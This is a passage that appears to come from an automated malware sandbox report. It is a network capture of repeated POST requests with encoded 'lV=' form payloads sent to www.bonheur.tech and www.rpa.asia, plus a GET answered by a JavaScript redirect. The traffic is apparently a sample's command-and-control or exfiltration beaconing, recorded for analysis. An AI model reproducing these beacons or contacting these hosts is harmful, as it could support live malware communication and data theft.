                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bonheur.tech
                                                                          Referer: http://www.bonheur.tech/t3iv/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 43 33 66 61 59 6b 55 63 35 72 38 55 32 2b 44 57 51 41 42 74 51 2b 53 4c 35 56 7a 64 57 41 53 43 33 4a 36 67 50 47 48 4d 75 41 41 33 4a 68 2b 58 4f 30 36 52 4d 36 32 71 56 51 4b 2b 74 54 51 38 52 33 62 38 4e 76 77 43 33 7a 51 64 34 51 55 38 73 54 2b 66 78 2f 33 6c 35 2f 42 55 30 6d 41 78 32 56 70 4e 33 52 67 72 74 57 7a 4e 6b 44 45 4a 44 46 4d 74 7a 64 6e 30 63 6f 67 68 6c 73 4b 6d 66 6a 35 6a 67 4a 4a 67 67 4f 73 54 6b 48 44 47 79 41 51 4c 54 6b 75 39 38 31 43 66 65 74 45 50 75 4b 71 6c 49 49 70 66 70 4e 78 79 73 35 57 2b 6b 55 78 57 39 43 4d 31 4f 46 58 67 30 4e 2b 33 48 77 3d 3d
                                                                          Data Ascii: lV=C3faYkUc5r8U2+DWQABtQ+SL5VzdWASC3J6gPGHMuAA3Jh+XO06RM62qVQK+tTQ8R3b8NvwC3zQd4QU8sT+fx/3l5/BU0mAx2VpN3RgrtWzNkDEJDFMtzdn0coghlsKmfj5jgJJggOsTkHDGyAQLTku981CfetEPuKqlIIpfpNxys5W+kUxW9CM1OFXg0N+3Hw==
                                                                          Jan 9, 2025 16:52:14.256603956 CET73INHTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          67192.168.11.204981276.223.54.14680
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:16.795026064 CET815OUTPOST /t3iv/ HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bonheur.tech
                                                                          Referer: http://www.bonheur.tech/t3iv/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 31 51 33 4a 46 36 58 63 42 61 52 4c 36 32 71 65 77 4b 37 69 7a 51 4e 52 33 58 72 4e 74 30 43 33 33 34 64 34 51 45 38 73 67 58 74 77 76 33 6e 67 50 42 53 37 47 41 78 32 56 70 4e 33 58 4e 4f 74 57 37 4e 6c 77 4d 4a 44 6b 4d 75 79 64 6e 31 66 6f 67 68 30 38 4b 69 66 6a 35 52 67 49 56 4f 67 4e 55 54 6b 47 7a 47 79 52 52 35 49 55 76 34 32 56 44 39 61 4f 35 41 6e 36 53 53 46 59 64 48 68 74 78 51 67 50 62 6b 35 6d 46 79 2b 52 51 48 4b 31 75 49 32 50 2f 73 61 2b 52 66 45 46 4a 71 46 68 55 62 51 6b 58 78 4f 76 37 61 38 64 45 3d
                                                                          Data Ascii: lV=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct1Q3JF6XcBaRL62qewK7izQNR3XrNt0C334d4QE8sgXtwv3ngPBS7GAx2VpN3XNOtW7NlwMJDkMuydn1fogh08Kifj5RgIVOgNUTkGzGyRR5IUv42VD9aO5An6SSFYdHhtxQgPbk5mFy+RQHK1uI2P/sa+RfEFJqFhUbQkXxOv7a8dE=
                                                                          Jan 9, 2025 16:52:16.935161114 CET73INHTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          68192.168.11.204981376.223.54.14680
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:20.480328083 CET5156OUTPOST /t3iv/ HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bonheur.tech
                                                                          Referer: http://www.bonheur.tech/t3iv/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 32 77 33 4b 77 75 58 4f 51 61 52 4b 36 32 71 43 67 4b 36 69 7a 51 51 52 33 50 6e 4e 74 35 33 33 78 38 64 2b 44 38 38 71 56 72 74 6c 2f 33 6e 6f 76 42 58 30 6d 41 6b 32 56 35 4a 33 58 39 4f 74 57 37 4e 6c 78 63 4a 58 6c 4d 75 2f 39 6e 30 63 6f 67 39 6c 73 4c 46 66 6a 77 6d 67 49 42 77 6a 39 30 54 6b 6d 6a 47 31 6a 35 35 45 55 76 32 31 56 44 62 61 4f 30 41 6e 37 2b 34 46 59 70 35 68 73 35 51 77 4a 44 37 6a 33 70 37 72 48 51 4a 41 55 32 78 36 4e 33 43 45 4d 68 77 46 6d 70 36 4b 30 41 66 54 79 58 59 61 50 62 6a 68 61 7a 7a 7a 36 36 66 32 4a 6a 67 52 6a 61 49 35 70 55 51 65 65 79 34 31 71 53 5a 62 65 79 64 4a 6c 64 53 6c 37 73 74 50 38 62 51 6e 77 69 30 54 35 4f 52 67 6d 6f 71 42 52 49 45 6d 77 4b 72 32 73 6f 52 70 76 6f 52 43 41 64 32 4f 61 78 6b 4c 55 6b 2f 5a 6b 64 6d 6a 55 4e 4c 79 65 58 55 76 53 4f 33 49 2b 42 32 69 71 4e 34 6a 48 71 37 74 59 35 61 4a 55 43 69 69 6b 6e [TRUNCATED]
                                                                          Data Ascii: lV=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct2w3KwuXOQaRK62qCgK6izQQR3PnNt533x8d+D88qVrtl/3novBX0mAk2V5J3X9OtW7NlxcJXlMu/9n0cog9lsLFfjwmgIBwj90TkmjG1j55EUv21VDbaO0An7+4FYp5hs5QwJD7j3p7rHQJAU2x6N3CEMhwFmp6K0AfTyXYaPbjhazzz66f2JjgRjaI5pUQeey41qSZbeydJldSl7stP8bQnwi0T5ORgmoqBRIEmwKr2soRpvoRCAd2OaxkLUk/ZkdmjUNLyeXUvSO3I+B2iqN4jHq7tY5aJUCiiknmREZA9cZcJkDO2+6oD/LVa2d15kffj9dR6J5GJ07aWok6vBILgh79bpV52H+cR+RE+UczrNL+4F0/w+f4EeShNuSZAyM/94xHEvT1ze5ORCDvmft4wdGDmNiNBkcMbEqG8uyxdDWD49kiEFlR5Lrtao8BOfU0vPvkKhgVPJ6AgcIfM3hrlry9drRguaUok91QHWpywFR0fc9fUUK+LR5nrYHYRNsWpred7L7Kw8aw9VCan1w0kDZrppLXc9PKNe4z6E6QsbfA3orN/rzanbrZVtD3A46lioLf6j0hXFupgIe0UmmQBc+S8qMPedqF7Jodn+xK4UqThoSK+SEtY8umi+qmd5qNuB/mntP3zCGbNBtQfyXupVJCwsPzpLPToP2Hw6oCvhqhS5vCntXxHrwJkYMkKusSCoVzWHSm3VuqJeWGAQbAFLr7ASGlEA940EcKSKqMhARluC4d6MA4QwVGg722mHYfLDXQ7Ib5Vk/XZJrfCeJKJKK8iGxKX1nUtjgaA4hK0V+PHmn1P6H7rzG77xV6g2Q7OjIiIWCM3q1d22eIUVXXFtz8NhIAT4O5qVgW88go0uqbXlqak0PrLNo7VUC3Rmeyzcvu50RVcANF3Yz7+MEbYmGmGmfxM3xkT2aF+IELIP4osdI/4xP7xrpMQFk21H7YSWc1D [TRUNCATED]
                                                                          Jan 9, 2025 16:52:20.616612911 CET73INHTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close
                                                                          Jan 9, 2025 16:52:20.616692066 CET1289OUTData Raw: 73 71 45 4a 59 79 48 4a 39 54 58 2b 77 35 2f 56 45 6e 4b 74 45 71 74 36 2f 4b 53 56 76 79 62 67 68 76 4a 65 6c 47 46 50 68 42 6e 4a 77 46 65 64 67 30 6e 34 6c 61 6d 6e 49 6d 2b 72 53 34 58 71 57 57 4d 37 68 65 45 59 42 34 73 74 4a 4d 77 2f 62 41
                                                                          Data Ascii: sqEJYyHJ9TX+w5/VEnKtEqt6/KSVvybghvJelGFPhBnJwFedg0n4lamnIm+rS4XqWWM7heEYB4stJMw/bAhQiGTjFlcntWbgoO1WmxLQrqR6N/BlIcfa1U/I/vmLTPqqzpR8xHv6jhRXbY2B4DxYTx6K+1sPkDjTmpgnAx6phri7sdAQ4M8UeLkOYZJlBGdoglkP3BtX7EiUVuE/cuL0LVW9+MnklIonoyp3vLhbgkrzBr11FNb
                                                                          Jan 9, 2025 16:52:20.616764069 CET1519OUTData Raw: 45 68 71 35 70 48 6c 62 38 4b 75 36 7a 74 44 44 6d 34 47 34 63 63 4a 6e 73 69 6b 54 6d 71 48 67 56 5a 48 46 41 55 31 61 31 56 2b 69 51 6c 65 42 64 4c 70 4d 4d 62 49 53 58 76 33 61 53 71 30 65 30 42 4c 6d 34 6e 75 31 70 34 4d 31 64 75 54 31 66 63
                                                                          Data Ascii: Ehq5pHlb8Ku6ztDDm4G4ccJnsikTmqHgVZHFAU1a1V+iQleBdLpMMbISXv3aSq0e0BLm4nu1p4M1duT1fclFJiwp3ZYvkbUSx+HtuNe1uwAAhdtYKncOU8GRlB+PytkizaHYfXFL9RUxbdfzy3rFg16lwoSLd2LmnBXKtxcVHNWpuvAggcJl/mvvB/x317Q1n2GmOXmQNgzIf0qrgzq21DXSivdejuIlWPggzYO1tEZ6g+tMXK8


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          69192.168.11.204981476.223.54.14680
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:23.149298906 CET530OUTGET /t3iv/?lV=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:52:24.321438074 CET374INHTTP/1.1 200 OK
                                                                          content-type: text/html
                                                                          date: Thu, 09 Jan 2025 15:52:24 GMT
                                                                          content-length: 253
                                                                          connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6c 56 3d 50 31 33 36 62 53 59 77 2f 62 6f 69 6e 36 75 74 45 42 5a 37 50 4c 43 36 38 32 44 59 47 51 48 6b 39 71 4b 4c 65 54 6d 58 72 57 41 65 50 79 61 48 54 53 44 4d 46 6f 61 75 42 54 57 78 30 69 67 31 53 33 43 56 46 73 78 33 30 69 55 74 6a 52 56 51 69 42 79 35 35 49 33 59 70 39 39 47 68 33 6b 6b 38 48 35 48 32 41 45 4d 71 6b 57 42 36 67 6b 69 53 48 41 44 77 50 63 3d 26 4c 53 62 61 54 3d 7a 66 74 34 4c 6f 42 77 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lV=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=&LSbaT=zft4LoBw"}</script></head></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          70192.168.11.2049815160.25.166.12380
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:29.689902067 CET783OUTPOST /bwjl/ HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.rpa.asia
                                                                          Referer: http://www.rpa.asia/bwjl/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 78 7a 39 6d 75 4f 35 64 48 50 31 76 52 6e 35 43 38 56 44 71 6a 50 65 4b 42 58 6e 66 38 50 4a 78 2b 34 2f 75 68 69 7a 41 35 62 35 36 52 46 57 4d 6e 71 52 37 6b 69 6c 32 34 4d 4a 53 32 63 78 4d 30 55 44 4e 32 67 74 66 6a 68 74 57 56 6f 35 4a 61 48 50 5a 63 31 4b 7a 6f 77 78 4e 41 46 73 53 4c 4d 48 33 5a 51 58 78 68 4a 54 51 49 52 48 72 2f 30 37 6a 42 39 72 68 31 6c 36 52 67 70 66 43 6b 2f 45 75 6d 66 72 7a 75 72 48 30 36 47 4a 6b 48 30 39 44 58 75 62 6b 36 58 4a 65 47 56 2b 42 72 76 70 41 67 33 4b 53 53 6f 38 33 67 6e 37 37 4a 63 61 31 7a 41 3d 3d
                                                                          Data Ascii: lV=On/0Uk0gKlcgxz9muO5dHP1vRn5C8VDqjPeKBXnf8PJx+4/uhizA5b56RFWMnqR7kil24MJS2cxM0UDN2gtfjhtWVo5JaHPZc1KzowxNAFsSLMH3ZQXxhJTQIRHr/07jB9rh1l6RgpfCk/EumfrzurH06GJkH09DXubk6XJeGV+BrvpAg3KSSo83gn77Jca1zA==
                                                                          Jan 9, 2025 16:52:30.037815094 CET1289INHTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:52:29 GMT
                                                                          server: LiteSpeed
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:52:30.037868023 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          71192.168.11.2049816160.25.166.12380
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:32.569895029 CET803OUTPOST /bwjl/ HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.rpa.asia
                                                                          Referer: http://www.rpa.asia/bwjl/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 64 78 39 63 7a 75 67 67 4c 41 38 62 35 36 65 6c 58 49 34 36 51 57 6b 69 68 45 34 4a 70 53 32 63 6c 4d 30 56 7a 4e 32 54 46 63 78 42 74 55 4f 34 35 48 55 6e 50 5a 63 31 4b 7a 6f 77 4d 67 41 45 45 53 49 38 33 33 61 78 58 79 73 70 54 54 66 68 48 72 70 30 37 76 42 39 71 30 31 6b 6d 37 67 76 44 43 6b 2b 30 75 6d 4f 72 77 67 72 48 74 30 6d 49 4d 50 47 30 37 4f 2b 2f 6d 71 47 38 48 48 41 36 6c 6a 5a 6b 61 39 46 2b 32 52 37 67 46 6b 58 43 54 4c 65 62 75 75 49 4d 76 39 57 7a 31 42 35 7a 58 39 74 74 61 55 6f 63 66 6d 39 49 3d
                                                                          Data Ascii: lV=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89dx9czuggLA8b56elXI46QWkihE4JpS2clM0VzN2TFcxBtUO45HUnPZc1KzowMgAEESI833axXyspTTfhHrp07vB9q01km7gvDCk+0umOrwgrHt0mIMPG07O+/mqG8HHA6ljZka9F+2R7gFkXCTLebuuIMv9Wz1B5zX9ttaUocfm9I=
                                                                          Jan 9, 2025 16:52:32.922620058 CET1289INHTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:52:32 GMT
                                                                          server: LiteSpeed
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:52:32.922663927 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          72192.168.11.2049817160.25.166.12380
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:35.454987049 CET2578OUTPOST /bwjl/ HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.rpa.asia
                                                                          Referer: http://www.rpa.asia/bwjl/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 6c 78 39 70 76 75 69 42 4c 41 2f 62 35 36 58 46 58 4c 34 36 52 55 6b 6b 4a 41 34 4a 74 6f 32 66 64 4d 79 33 4c 4e 77 69 46 63 6f 78 74 55 52 6f 35 4b 61 48 4f 52 63 30 36 33 6f 32 73 67 41 45 45 53 49 2b 76 33 4e 77 58 79 71 70 54 51 49 52 48 6e 2f 30 37 4c 42 39 69 6b 31 6b 69 42 6a 5a 7a 43 6b 65 6b 75 6e 38 44 77 2f 37 48 34 35 47 49 55 50 47 6f 6b 4f 2b 79 58 71 46 68 73 48 48 4f 6c 67 34 56 61 74 45 69 49 45 5a 30 72 74 6a 4f 43 43 76 76 6a 78 4c 63 52 34 77 6e 43 42 75 4c 4d 38 64 56 69 41 4b 63 4a 33 49 72 71 72 78 36 39 46 54 2b 45 78 65 59 34 39 6e 34 30 33 69 45 32 62 38 75 65 70 78 4c 36 4c 59 66 42 59 76 69 63 71 52 70 69 31 56 56 7a 34 50 48 6a 45 72 30 69 68 32 64 37 2b 32 43 59 6c 6c 6f 32 6b 78 46 5a 45 39 5a 6c 65 77 51 5a 32 46 55 72 64 42 45 43 7a 6a 55 51 70 72 49 2b 32 6c 75 38 34 45 62 34 59 33 41 6d 63 53 2b 31 76 68 38 36 59 42 37 63 44 6b 42 [TRUNCATED]
                                                                          Data Ascii: lV=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89lx9pvuiBLA/b56XFXL46RUkkJA4Jto2fdMy3LNwiFcoxtURo5KaHORc063o2sgAEESI+v3NwXyqpTQIRHn/07LB9ik1kiBjZzCkekun8Dw/7H45GIUPGokO+yXqFhsHHOlg4VatEiIEZ0rtjOCCvvjxLcR4wnCBuLM8dViAKcJ3Irqrx69FT+ExeY49n403iE2b8uepxL6LYfBYvicqRpi1VVz4PHjEr0ih2d7+2CYllo2kxFZE9ZlewQZ2FUrdBECzjUQprI+2lu84Eb4Y3AmcS+1vh86YB7cDkBc/L+te1Ja/SBLsL+5tSuRd2rSkKy7TGSkcJ3Od3HHSAVpQ+FGOCkUjtVyy474RpR3AJ6mgr5qZVPKTrVQ/X1sC9LVkxJzfbg2If3lv84aN75soJUUgqi44ndrb5JHzdpuAIzVGeOeG78zJ+vowD0Y5lmTvY4zof1N9lyKYzXX0QBpbBvolu7yM56i/TiqZMaHNNS7wqFqr3JS1+vC7AhGtWMjJ6IujVCsRsgK+qUIHWJmgJEJzZVyXSvsjVkfyhhCk916FtrfIt4i2EJtmWOqJI9TKWVFYBLK+i0lnJgTm4Mk9NWb9HemyRHYowXvCTOFWE1H7WUZctYCr7MowHq7SXMBaDml2lodYWp75l6VH5eySNe+lqxnZdpDr2jXSKpcDUV6jwsTkePhvZaT84T+MvaO3waHYRCTFYfyME86lgYlt4dJ58EfwdM8XBu/cmkLl5OU16BTneJScuZ2MHe5dE2VvhIczCcqhjC3CULC19rSMvKRg35UemXW4CCD/3mGYxVJ9C154GPlSEF+dLnqKP5/M0mSxjhvdbcjMh7THfDR7Mtz7AFa1F2pi4jacqEvRD8xeEf0hwQSb7GuAPT2Kjp5dkVb4u2kfY0Llbh/ZkQDNq60vMEkMsSnyIRuWYpcMX3gOqpZp2mQ/dYYHfWcrOLPaTWI+qJ4i [TRUNCATED]
